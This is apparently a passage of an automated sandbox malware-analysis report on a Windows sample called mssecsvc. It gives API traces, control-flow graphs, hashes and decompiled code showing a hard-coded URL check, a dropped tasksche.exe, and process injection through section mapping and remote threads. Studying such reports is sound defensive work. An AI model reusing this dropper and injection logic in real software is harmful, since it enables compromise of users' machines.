                    • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
                    • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
                    • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
                    • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
                    • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
                    • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
                    • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
                    • sprintf.MSVCRT ref: 00407E01
                    • sprintf.MSVCRT ref: 00407E18
                    • MoveFileExA.KERNEL32 ref: 00407E2C
                    • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000004,00000000), ref: 00407E43
                    • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00407E61
                    • CloseHandle.KERNEL32(00000000), ref: 00407E68
                    • CreateProcessA.KERNELBASE ref: 00407EE8
                    • CloseHandle.KERNEL32(00000000), ref: 00407EF7
                    • CloseHandle.KERNEL32(08000000), ref: 00407F02
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.706408754.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.706383817.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.706449396.0000000000409000.00000040.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.706496424.000000000040A000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.706511884.000000000040B000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.706619607.000000000040F000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.706680871.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.706767542.0000000000710000.00000080.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.708228244.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleProcResource$CloseFile$Createsprintf$FindLoadLockModuleMoveProcessSizeofWrite
                    • String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
                    • API String ID: 4281112323-1507730452
                    • Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                    • Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
                    • Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                    • Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 13 b0042d-b004a4 call b010ce 16 b004a6-b004db call b0273c GetModuleHandleA 13->16 17 b004dd 13->17 19 b004e4-b00509 call b02750 GetVersion 16->19 17->19 23 b005ca-b005d1 19->23 24 b0050f-b00530 VirtualAlloc 19->24 26 b005a9-b005b3 FindCloseChangeNotification 23->26 27 b005d3-b005fc SetProcessAffinityMask call b005f2 23->27 25 b00532-b00562 call b00305 24->25 24->26 25->26 37 b00564-b0057b 25->37 26->23 32 b00621-b00623 27->32 33 b005fe-b0061c 27->33 35 b00625-b00630 32->35 36 b0064c-b00652 32->36 33->32 38 b00632 35->38 39 b00639-b00648 35->39 36->26 40 b00658-b00671 36->40 37->26 46 b0057d-b005a4 call b005ba 37->46 38->39 39->36 40->26 41 b00677-b00690 40->41 41->26 43 b00696-b0069c 41->43 44 b006d8-b006de 43->44 45 b0069e-b006b1 43->45 48 b006e0-b006f3 44->48 49 b006fc-b00715 lstrcpyW call b024ae 44->49 45->26 47 b006b7-b006bd 45->47 46->26 47->44 50 b006bf-b006d2 47->50 48->49 51 b006f5 48->51 55 b00717-b00746 GetPEB lstrcpyW lstrcatW call b024ae 49->55 56 b0074c-b00775 NtMapViewOfSection 49->56 50->26 50->44 51->49 55->26 55->56 56->26 60 b0077b-b0078f call b00305 NtOpenProcessToken 56->60 64 b00791-b007a3 call b0115d call b007ac 60->64 65 b007c5-b007e4 CreateToolhelp32Snapshot Process32First 60->65 75 b007a5 64->75 76 b0080e-b0080f 64->76 67 b007eb-b007f5 Process32Next 65->67 69 b00865-b00872 FindCloseChangeNotification 67->69 70 b007f7-b007fb 67->70 69->26 70->67 72 b007fd-b0080d OpenProcess 70->72 72->67 74 b0080f 72->74 77 b00810-b00818 call b02574 74->77 75->77 78 b007a7-b007e4 CreateToolhelp32Snapshot Process32First 75->78 76->77 82 b0081a-b00820 77->82 83 b0085c-b00863 FindCloseChangeNotification 77->83 78->67 82->83 84 b00822-b00832 82->84 83->67 84->83 85 b00834-b0084b CreateRemoteThread 84->85 85->83 86 b0084d-b00857 call b005ba 85->86 86->83
                    APIs
                    • GetModuleHandleA.KERNEL32(00000000), ref: 00B004BE
                    • GetVersion.KERNEL32 ref: 00B00500
                    • VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 00B00528
                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00B005AD
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocChangeCloseFindHandleModuleNotificationVersionVirtual
                    • String ID: \BaseNamedObjects\itatVt$\BaseNamedObjects\itatVt$csrs
                    • API String ID: 2920002527-1607376603
                    • Opcode ID: c1a75dacefef55607d8e276d79dbd6456a9246beeb38c8f7a5af848b843aeecc
                    • Instruction ID: 775bc6d69aabd4a0e6fcc729b728636314efbc8215d00e786c14d42672abc0c0
                    • Opcode Fuzzy Hash: c1a75dacefef55607d8e276d79dbd6456a9246beeb38c8f7a5af848b843aeecc
                    • Instruction Fuzzy Hash: 19B1C931625249FFEB21AF24CC4ABAA3FA9FF55310F0040A9E9099E1C1C7F19F449B59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 88 b005f2-b00615 GetModuleHandleA call b010ce 91 b00617-b00630 88->91 92 b005a9-b005b3 FindCloseChangeNotification 88->92 93 b00632 91->93 94 b00639-b00648 91->94 95 b005ca-b005d1 92->95 93->94 96 b0064c-b00652 94->96 95->92 97 b005d3-b005fc SetProcessAffinityMask call b005f2 95->97 96->92 98 b00658-b00671 96->98 105 b00621-b00623 97->105 106 b005fe-b0061c 97->106 98->92 100 b00677-b00690 98->100 100->92 102 b00696-b0069c 100->102 103 b006d8-b006de 102->103 104 b0069e-b006b1 102->104 108 b006e0-b006f3 103->108 109 b006fc-b00715 lstrcpyW call b024ae 103->109 104->92 107 b006b7-b006bd 104->107 105->96 110 b00625-b00630 105->110 106->105 107->103 111 b006bf-b006d2 107->111 108->109 112 b006f5 108->112 115 b00717-b00746 GetPEB lstrcpyW lstrcatW call b024ae 109->115 116 b0074c-b00775 NtMapViewOfSection 109->116 110->93 110->94 111->92 111->103 112->109 115->92 115->116 116->92 118 b0077b-b0078f call b00305 NtOpenProcessToken 116->118 122 b00791-b007a3 call b0115d call b007ac 118->122 123 b007c5-b007e4 CreateToolhelp32Snapshot Process32First 118->123 133 b007a5 122->133 134 b0080e-b0080f 122->134 125 b007eb-b007f5 Process32Next 123->125 127 b00865-b00872 FindCloseChangeNotification 125->127 128 b007f7-b007fb 125->128 127->92 128->125 130 b007fd-b0080d OpenProcess 128->130 130->125 132 b0080f 130->132 135 b00810-b00818 call b02574 132->135 133->135 136 b007a7-b007e4 CreateToolhelp32Snapshot Process32First 133->136 134->135 140 b0081a-b00820 135->140 141 b0085c-b00863 FindCloseChangeNotification 135->141 136->125 140->141 142 b00822-b00832 140->142 141->125 142->141 143 b00834-b0084b CreateRemoteThread 142->143 143->141 144 b0084d-b00857 call b005ba 143->144 144->141
                    APIs
                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00B005AD
                    • GetModuleHandleA.KERNEL32(00B005EC), ref: 00B005F2
                    • lstrcpyW.KERNEL32(\BaseNamedObjects\itatVt,\BaseNamedObjects\itatVt), ref: 00B0070A
                    • lstrcpyW.KERNEL32(\BaseNamedObjects\itatVt,?), ref: 00B0072D
                    • lstrcatW.KERNEL32(\BaseNamedObjects\itatVt,\itatVt), ref: 00B0073B
                    • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 00B0076B
                    • NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 00B00786
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B007C9
                    • Process32First.KERNEL32 ref: 00B007DC
                    • Process32Next.KERNEL32 ref: 00B007ED
                    • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B00805
                    • CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00B00842
                    • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B0085D
                    • FindCloseChangeNotification.KERNELBASE ref: 00B0086C
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ChangeCloseFindNotification$CreateOpenProcessProcess32lstrcpy$FirstHandleModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
                    • String ID: \BaseNamedObjects\itatVt$\BaseNamedObjects\itatVt$csrs
                    • API String ID: 3804105423-1607376603
                    • Opcode ID: 32195eb0042ebaec25477c261ddf2c99814d954fd4820c083845d242e76727b2
                    • Instruction ID: ee33d0d1fe11cc1d964e6f3ef08f96cf060e41703d3cee014b274f1868e16f79
                    • Opcode Fuzzy Hash: 32195eb0042ebaec25477c261ddf2c99814d954fd4820c083845d242e76727b2
                    • Instruction Fuzzy Hash: A971A831510209FFEB21AF10CC4ABAE3FADEF59311F1040A9E9099E0D1C7B59F459B59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 250 b0252f-b02573 NtOpenSection
                    APIs
                    • NtOpenSection.NTDLL(?,0000000E), ref: 00B0255E
                    Strings
                    • \BaseNamedObjects\itatVt, xrefs: 00B0254B
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: OpenSection
                    • String ID: \BaseNamedObjects\itatVt
                    • API String ID: 1950954290-326862825
                    • Opcode ID: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                    • Instruction ID: cc492c20b74137972e1aeb42a549193fdcd5baff80c1f90c3202c4eb3a6ea2fd
                    • Opcode Fuzzy Hash: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                    • Instruction Fuzzy Hash: A1E0DFF1342105BAFB288B19CC07FB7220DCBC0600F048604F918DA090E6F4AF104278
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 251 b02574-b0257c call b0252f 254 b02661-b02664 251->254 255 b02582-b025b4 NtMapViewOfSection FindCloseChangeNotification 251->255 255->254 256 b025ba-b025c0 255->256 257 b025c2-b025cb 256->257 258 b025ce-b025d8 256->258 257->258 259 b025da-b025e2 258->259 260 b025ef-b0262a call b02477 * 3 258->260 259->260 262 b025e4-b025ea call b02477 259->262 269 b02637-b0263f 260->269 270 b0262c-b02632 call b02477 260->270 262->260 272 b02641-b02647 call b02477 269->272 273 b0264c-b02654 269->273 270->269 272->273 273->254 275 b02656-b0265c call b02477 273->275 275->254
                    APIs
                      • Part of subcall function 00B0252F: NtOpenSection.NTDLL(?,0000000E), ref: 00B0255E
                    • NtMapViewOfSection.NTDLL(00000000,?,?,00000000,0000B7C4,00000000,?,00000002,00100000,00000040), ref: 00B025A4
                    • FindCloseChangeNotification.KERNELBASE(00000000,0000B7C4,00000000,?,00000002,00100000,00000040,00000000,0000B7C4,00000000,?,00B00815), ref: 00B025AC
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Section$ChangeCloseFindNotificationOpenView
                    • String ID:
                    • API String ID: 1694706092-0
                    • Opcode ID: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                    • Instruction ID: d3f5b40c626df736e049f7246ff985d567c5d05cf1db0248d21d5c6056eb10d8
                    • Opcode Fuzzy Hash: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                    • Instruction Fuzzy Hash: 0F213E70300546BBDB28DF25CC5AFA9BBA9FF91744F404158F9198E2D4DBB2AE18C718
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 277 b01422-b01474 LookupPrivilegeValueA NtAdjustPrivilegesToken
                    APIs
                    • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00B0145A
                    • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00B0146A
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                    • String ID:
                    • API String ID: 3615134276-0
                    • Opcode ID: 93769c60b222f1b750d747f357397c67afbd40ef6ee3f9ba66e61aa9824ec2a4
                    • Instruction ID: ddbff97e699881e74d61e2820170bd54818263a6fff0c1519b9bac5ac29647fb
                    • Opcode Fuzzy Hash: 93769c60b222f1b750d747f357397c67afbd40ef6ee3f9ba66e61aa9824ec2a4
                    • Instruction Fuzzy Hash: 5BF0AE36542510BBD7205F56CD8EED77F28EF533A0F144556F4484E151C2624BA5D3F4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 278 b02477-b024ad NtProtectVirtualMemory NtWriteVirtualMemory
                    APIs
                    • NtProtectVirtualMemory.NTDLL(?,?,?,00000040), ref: 00B0249B
                    • NtWriteVirtualMemory.NTDLL ref: 00B024A4
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: MemoryVirtual$ProtectWrite
                    • String ID:
                    • API String ID: 151266762-0
                    • Opcode ID: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                    • Instruction ID: 6bbb67ea70d6ee96dfa5f1d7b4d314b28acc786a60d934acbd3f762ecc45b662
                    • Opcode Fuzzy Hash: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                    • Instruction Fuzzy Hash: 2AE012E07502007FF5185F55DC5FF7B391DDB41751F410208FA0A981C4F9A15E18467A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 279 b0144a-b01474 LookupPrivilegeValueA NtAdjustPrivilegesToken
                    APIs
                    • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00B0145A
                    • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00B0146A
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                    • String ID:
                    • API String ID: 3615134276-0
                    • Opcode ID: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                    • Instruction ID: ee32c209e3d0a2de55b6acbdbca8a3d00d8b73f2470e3acbbab87dcaf3c2c19a
                    • Opcode Fuzzy Hash: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                    • Instruction Fuzzy Hash: F2D06731643034BBD6312A568C0EEE77D1DEF577A0F015041F9089A1A1C5A28EA1C7F5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 146 409a16-409a8b __set_app_type __p__fmode __p__commode call 409ba1 149 409a99-409af0 call 409b8c _initterm __getmainargs _initterm 146->149 150 409a8d-409a98 __setusermatherr 146->150 153 409af2-409afa 149->153 154 409b2c-409b2f 149->154 150->149 157 409b00-409b03 153->157 158 409afc-409afe 153->158 155 409b31-409b35 154->155 156 409b09-409b0d 154->156 155->154 160 409b13-409b24 GetStartupInfoA 156->160 161 409b0f-409b11 156->161 157->156 159 409b05-409b06 157->159 158->153 158->157 159->156 162 409b26-409b2a 160->162 163 409b37-409b39 160->163 161->159 161->160 164 409b3a-409b45 GetModuleHandleA call 408140 162->164 163->164 166 409b4a-409b67 exit _XcptFilter 164->166
                    C-Code - Quality: 71%
                    			_entry_(void* __ebx, void* __edi, void* __esi) {
                    				CHAR* _v8;
                    				intOrPtr* _v24;
                    				intOrPtr _v28;
                    				struct _STARTUPINFOA _v96;
                    				int _v100;
                    				char** _v104;
                    				int _v108;
                    				void _v112;
                    				char** _v116;
                    				intOrPtr* _v120;
                    				intOrPtr _v124;
                    				void* _t27;
                    				intOrPtr _t36;
                    				signed int _t38;
                    				int _t40;
                    				intOrPtr* _t41;
                    				intOrPtr _t42;
                    				intOrPtr _t49;
                    				intOrPtr* _t55;
                    				intOrPtr _t58;
                    				intOrPtr _t61;
                    
                    				_push(0xffffffff);
                    				_push(0x40a1a0);
                    				_push(0x409ba2);
                    				_push( *[fs:0x0]);
                    				 *[fs:0x0] = _t58;
                    				_v28 = _t58 - 0x68;
                    				_v8 = 0;
                    				__set_app_type(2);
                    				 *0x70f894 =  *0x70f894 | 0xffffffff;
                    				 *0x70f898 =  *0x70f898 | 0xffffffff;
                    				 *(__p__fmode()) =  *0x70f88c;
                    				 *(__p__commode()) =  *0x70f888;
                    				 *0x70f890 = _adjust_fdiv;
                    				_t27 = E00409BA1( *_adjust_fdiv);
                    				_t61 =  *0x431410; // 0x1
                    				if(_t61 == 0) {
                    					__setusermatherr(E00409B9E);
                    				}
                    				E00409B8C(_t27);
                    				_push(0x40b010);
                    				_push(0x40b00c);
                    				L00409B86();
                    				_v112 =  *0x70f884;
                    				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
                    				_push(0x40b008);
                    				_push(0x40b000); // executed
                    				L00409B86(); // executed
                    				_t55 =  *_acmdln;
                    				_v120 = _t55;
                    				if( *_t55 != 0x22) {
                    					while( *_t55 > 0x20) {
                    						_t55 = _t55 + 1;
                    						_v120 = _t55;
                    					}
                    				} else {
                    					do {
                    						_t55 = _t55 + 1;
                    						_v120 = _t55;
                    						_t42 =  *_t55;
                    					} while (_t42 != 0 && _t42 != 0x22);
                    					if( *_t55 == 0x22) {
                    						L6:
                    						_t55 = _t55 + 1;
                    						_v120 = _t55;
                    					}
                    				}
                    				_t36 =  *_t55;
                    				if(_t36 != 0 && _t36 <= 0x20) {
                    					goto L6;
                    				}
                    				_v96.dwFlags = 0;
                    				GetStartupInfoA( &_v96);
                    				if((_v96.dwFlags & 0x00000001) == 0) {
                    					_t38 = 0xa;
                    				} else {
                    					_t38 = _v96.wShowWindow & 0x0000ffff;
                    				}
                    				_push(_t38);
                    				_push(_t55);
                    				_push(0);
                    				_push(GetModuleHandleA(0));
                    				_t40 = E00408140();
                    				_v108 = _t40;
                    				exit(_t40);
                    				_t41 = _v24;
                    				_t49 =  *((intOrPtr*)( *_t41));
                    				_v124 = _t49;
                    				_push(_t41);
                    				_push(_t49);
                    				L00409B80();
                    				return _t41;
                    			}


                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.706449396.0000000000409000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.706383817.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.706408754.0000000000401000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.706496424.000000000040A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.706511884.000000000040B000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.706619607.000000000040F000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.706680871.0000000000431000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.706767542.0000000000710000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.708228244.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                    • String ID:
                    • API String ID: 801014965-0
                    • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                    • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
                    • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                    • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 167 b007ac-b007bf call b0144a FreeLibrary FindCloseChangeNotification 170 b007c5-b007e4 CreateToolhelp32Snapshot Process32First 167->170 171 b007eb-b007f5 Process32Next 170->171 172 b00865-b00872 FindCloseChangeNotification 171->172 173 b007f7-b007fb 171->173 174 b005a9-b005d1 FindCloseChangeNotification 172->174 173->171 175 b007fd-b0080d OpenProcess 173->175 179 b005d3-b005fc SetProcessAffinityMask call b005f2 174->179 175->171 176 b0080f 175->176 178 b00810-b00818 call b02574 176->178 184 b0081a-b00820 178->184 185 b0085c-b00863 FindCloseChangeNotification 178->185 187 b00621-b00623 179->187 188 b005fe-b0061c 179->188 184->185 186 b00822-b00832 184->186 185->171 186->185 189 b00834-b0084b CreateRemoteThread 186->189 190 b00625-b00630 187->190 191 b0064c-b00652 187->191 188->187 189->185 192 b0084d-b00857 call b005ba 189->192 193 b00632 190->193 194 b00639-b00648 190->194 191->174 195 b00658-b00671 191->195 192->185 193->194 194->191 195->174 197 b00677-b00690 195->197 197->174 198 b00696-b0069c 197->198 199 b006d8-b006de 198->199 200 b0069e-b006b1 198->200 202 b006e0-b006f3 199->202 203 b006fc-b00715 lstrcpyW call b024ae 199->203 200->174 201 b006b7-b006bd 200->201 201->199 204 b006bf-b006d2 201->204 202->203 205 b006f5 202->205 208 b00717-b00746 GetPEB lstrcpyW lstrcatW call b024ae 203->208 209 b0074c-b00775 NtMapViewOfSection 203->209 204->174 204->199 205->203 208->174 208->209 209->174 211 b0077b-b0078f call b00305 NtOpenProcessToken 209->211 211->170 215 b00791-b007a3 call b0115d call b007ac 211->215 220 b007a5 215->220 221 b0080e-b0080f 215->221 220->178 222 b007a7-b007e4 CreateToolhelp32Snapshot Process32First 220->222 221->178 222->171
                    APIs
                      • Part of subcall function 00B0144A: LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00B0145A
                      • Part of subcall function 00B0144A: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00B0146A
                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00B005AD
                    • FreeLibrary.KERNEL32(76EF0000,?,00B0079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B007B8
                    • FindCloseChangeNotification.KERNELBASE(?,?,00B0079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B007BF
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B007C9
                    • Process32First.KERNEL32 ref: 00B007DC
                    • Process32Next.KERNEL32 ref: 00B007ED
                    • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B00805
                    • CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00B00842
                    • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B0085D
                    • FindCloseChangeNotification.KERNELBASE ref: 00B0086C
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ChangeCloseFindNotification$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
                    • String ID: csrs
                    • API String ID: 238827593-2321902090
                    • Opcode ID: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
                    • Instruction ID: 1aa63aa34c53b7b6fd0117475550230dcc78404d8e010b5726b5b7faae6631a0
                    • Opcode Fuzzy Hash: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
                    • Instruction Fuzzy Hash: 0C113030511205BFEB256F21CC4ABBF3EADEF54702F0040ACF94A9A091D7B49F019A6A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 92%
                    			E00408140() {
                    				char* _v1;
                    				char* _v3;
                    				char* _v7;
                    				char* _v11;
                    				char* _v15;
                    				char* _v19;
                    				char* _v23;
                    				void _v80;
                    				char _v100;
                    				char* _t12;
                    				void* _t13;
                    				void* _t27;
                    
                    				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
                    				asm("movsb");
                    				_v23 = _t12;
                    				_v19 = _t12;
                    				_v15 = _t12;
                    				_v11 = _t12;
                    				_v7 = _t12;
                    				_v3 = _t12;
                    				_v1 = _t12;
                    				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
                    				_t27 = _t13;
                    				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
                    				InternetCloseHandle(_t27); // executed
                    				InternetCloseHandle(0);
                    				E00408090();
                    				return 0;
                    			}

                    APIs
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
                    • InternetCloseHandle.WININET(00000000), ref: 004081A7
                    • InternetCloseHandle.WININET(00000000), ref: 004081AB
                      • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                      • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
                    Strings
                    • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A
                    Memory Dump Source
                    • Source File: 00000004.00000002.706408754.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.706383817.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.706449396.0000000000409000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.706496424.000000000040A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.706511884.000000000040B000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.706619607.000000000040F000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.706680871.0000000000431000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.706767542.0000000000710000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.708228244.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
                    • String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
